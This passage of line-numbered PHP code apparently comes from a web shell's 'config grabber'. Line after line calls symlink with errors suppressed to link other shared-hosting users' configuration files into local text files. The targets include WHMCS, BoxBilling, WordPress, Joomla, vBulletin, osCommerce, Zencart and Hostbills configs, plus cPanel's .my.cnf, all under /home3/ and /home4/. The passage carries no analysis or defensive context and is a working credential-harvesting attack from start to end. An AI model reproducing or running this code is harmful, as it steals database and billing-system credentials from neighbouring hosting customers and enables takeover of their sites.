  1367. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1425. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1451. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1452. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1453. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1454. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1455. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1456. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1457. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1458. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1459. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1460. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1461. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1462. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1463. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1464. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1465. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1466. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1467. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1468. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1469. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1470. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1471. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1472. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1473. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1474. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1475. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1476. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1477. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1478. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1479. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1480. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1481. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1482. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1483. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1484. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1485. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1486. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1487. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1488. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1489. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1490. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1491. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1492. @symlink('/home3/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1493. @symlink('/home3/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1494. //Home4
  1495.  
  1496. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1497. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1498. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1499. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1500. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1501. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1502. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1503. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1504. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1505. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1506. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1507. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1508. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1509. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1510. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1511. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1512. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1513. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1514. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1515. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1516. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1517. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1518. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1519. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1520. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1521. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1522. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1523. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1524. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1525. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1526. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1527. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1528. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1529. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1530. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1531. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1532. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1533. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1534. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1535. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1536. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1537. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1538. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1539. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1540. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1541. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1542. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1625. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1626. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1627. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1628. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1629. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1630. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1631. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1632. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1633. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1634. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1635. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1636. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1637. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1638. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1639. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1640. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1641. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1642. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1643. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1644. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1645. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1646. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1647. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1648. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1649. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1650. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1651. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1652. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1653. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1654. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1655. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1656. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1657. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1658. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1659. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1660. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1661. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1662. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1663. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1664. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1665. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1666. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1667. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1668. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1669. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1670. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
